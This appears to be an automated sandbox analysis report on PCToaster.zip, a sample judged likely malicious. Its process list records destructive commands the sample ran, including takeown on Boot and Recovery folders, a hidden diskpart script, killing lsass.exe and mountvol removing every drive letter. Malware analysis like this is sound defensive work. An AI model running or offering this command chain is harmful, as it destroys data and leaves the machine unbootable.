Analysis Overview
SHA256
839e2e8904c5d91ab82e848a0f5ee93de32cf1d8539a9be8676d77c948e8ad14
Threat Level: Likely malicious
The file PCToaster.zip was found to be: Likely malicious.
Malicious Activity Summary
Possible privilege escalation attempt
Modifies file permissions
Enumerates connected drives
Drops file in Windows directory
Unsigned PE
Checks SCSI registry key(s)
Views/modifies file attributes
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Kills process with taskkill
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-19 15:44
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-19 15:44
Reported
2024-06-19 15:46
Platform
win10-20240404-en
Max time kernel
105s
Max time network
85s
Command Line
Signatures
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\takeown.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\G: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SYSTEM32\takeown.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SYSTEM32\takeown.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\rescache\_merged\1601268389\715946058.pri | C:\Windows\system32\taskmgr.exe | N/A |
| File created | C:\Windows\rescache\_merged\4183903823\2290032291.pri | C:\Windows\system32\taskmgr.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\System32\vds.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\System32\vds.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_QEMU&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\System32\vds.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\System32\vds.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SYSTEM32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| N/A | N/A | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| N/A | N/A | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
| N/A | N/A | C:\Program Files\Java\jre-1.8\bin\javaw.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\PCToaster.exe
"C:\Users\Admin\AppData\Local\Temp\PCToaster.exe"
C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\PCToaster.exe"
C:\Windows\system32\icacls.exe
C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
C:\Windows\SYSTEM32\attrib.exe
attrib +h C:\Users\Admin\AppData\Local\Temp\scr.txt
C:\Windows\SYSTEM32\diskpart.exe
diskpart /s C:\Users\Admin\AppData\Local\Temp\scr.txt
C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
C:\Windows\SYSTEM32\takeown.exe
takeown /f V:\Boot /r
C:\Windows\SYSTEM32\takeown.exe
takeown /f V:\Recovery /r
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\SYSTEM32\taskkill.exe
taskkill /im lsass.exe /f
C:\Windows\SYSTEM32\mountvol.exe
mountvol A: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol B: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol D: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol E: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol F: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol G: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol H: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol I: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol J: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol K: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol L: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol M: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol N: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol O: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol P: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol Q: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol R: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol S: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol T: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol U: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol V: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol W: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol X: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol Y: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol Z: /d
C:\Windows\SYSTEM32\mountvol.exe
mountvol C: /d
Network
| Country | Destination | Domain | Proto |
| US | 52.111.227.14:443 | | tcp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
memory/4948-0-0x0000000000400000-0x000000000046E000-memory.dmp
memory/4184-3-0x0000027A2F7C0000-0x0000027A2FA30000-memory.dmp
C:\ProgramData\Oracle\Java\.oracle_jre_usage\3903daac9bc4a3b7.timestamp
| MD5 | 410c8faa8c12c7fa5b49d32a1503e4f9 |
| SHA1 | 7700654c3abc921d9e1483a741bcff1212e4021f |
| SHA256 | a851ff77969762d03848c31ca36083c8b37d7abef360bcaded11432ea6474c7b |
| SHA512 | d7d87c6916afb7e23d23ee62d9501ea4d427962ee4627f5f8300e515bd4b34df32fc6bedfd345dac52387b407f58c76ffab8e7ac4bd9783d294a68e59382ccab |
C:\Users\Admin\AppData\Local\Temp\scr.txt
| MD5 | ad1869d6f0b2b809394605d3e73eeb74 |
| SHA1 | 4bdedd14bfea9f891b98c4cc82c5f82a58df67f6 |
| SHA256 | 7e9cde40095f2a877375cb30fecd4f64cf328e3ab11baed5242f73cbb94bd394 |
| SHA512 | 8fe0f269daf94feaa246a644dbeeda52916855f1d2bfd2c6c876c7c9c80b0ceb7e42caf0b64a70bda9a64d4529b885aaa38998a515d6abbe88ad367e72324136 |
memory/4184-24-0x0000027A2DF30000-0x0000027A2DF31000-memory.dmp
memory/4184-27-0x0000027A2DF30000-0x0000027A2DF31000-memory.dmp
memory/4184-29-0x0000027A2F7C0000-0x0000027A2FA30000-memory.dmp
memory/4184-79-0x0000027A2DF30000-0x0000027A2DF31000-memory.dmp
memory/4184-103-0x0000027A2DF30000-0x0000027A2DF31000-memory.dmp
memory/4184-116-0x0000027A2DF30000-0x0000027A2DF31000-memory.dmp
memory/4184-121-0x0000027A2DF30000-0x0000027A2DF31000-memory.dmp
memory/4184-123-0x0000027A2DF30000-0x0000027A2DF31000-memory.dmp
memory/4184-126-0x0000027A2DF30000-0x0000027A2DF31000-memory.dmp